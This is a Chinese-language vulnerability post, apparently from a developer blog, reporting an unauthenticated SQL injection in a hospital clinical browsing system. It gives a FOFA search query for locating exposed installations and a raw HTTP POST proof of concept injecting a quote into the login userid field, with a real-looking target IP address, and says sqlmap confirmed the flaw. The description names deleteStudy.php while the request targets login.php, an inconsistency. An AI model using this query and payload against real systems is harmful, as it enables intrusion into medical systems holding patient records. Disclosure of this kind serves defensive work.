蓝网科技临床浏览系统存在SQL注入漏洞

漏洞描述

蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。在deleteStudy.php中的接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息,例如添加、删除或修改记录,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

FOFA

复制代码
title="临床浏览"

漏洞复现

POC

复制代码
POST /login.php HTTP/1.1
Host: 
Content-Length: 39
Cache-Control: max-age=0
Origin: http://106.3.96.36:82
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://106.3.96.36:82/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=rst1vmi4v952mkv1qe6hfia6b3
Connection: keep-alive

userid=admin'&password=11111111&submit=

bp报错

sqlmap确认有漏洞

相关推荐
数据库砖家1 分钟前
YashanDB 知识库|手把手教你回收表空间,释放磁盘的正确姿势!
数据库
一只栖枝7 分钟前
关于OCP认证:有Oracle和MySQL两种
数据库·mysql·oracle·开闭原则·数据管理·ocp认证
小Tomkk20 分钟前
StarRocks SRCA 考试心得总结
数据库·数据库 starrocks·srca
千千寰宇29 分钟前
[数据库/SQL] 浅谈DDL、DSL、DCL、DML、DQL
数据库
九河云33 分钟前
汽车制造行业如何在数字化转型中抓住机遇?
科技·重构·云计算·汽车·制造
爱编程的小新☆1 小时前
【MySQL】数据类型和表的操作
java·数据库·mysql
聪明的墨菲特i2 小时前
SQL进阶知识:七、数据库设计
数据库·sql·mysql·oracle·db2·数据库设计·范式
APItesterCris4 小时前
Flutter 移动端开发:集成淘宝 API 实现商品数据实时展示 APP
大数据·数据库·flutter
极小狐4 小时前
极狐GitLab 议题权重有什么作用?
开发语言·数据库·chrome·c#·gitlab
懵逼的小黑子5 小时前
解释两个 Django 命令 makemigrations和migrate
数据库·django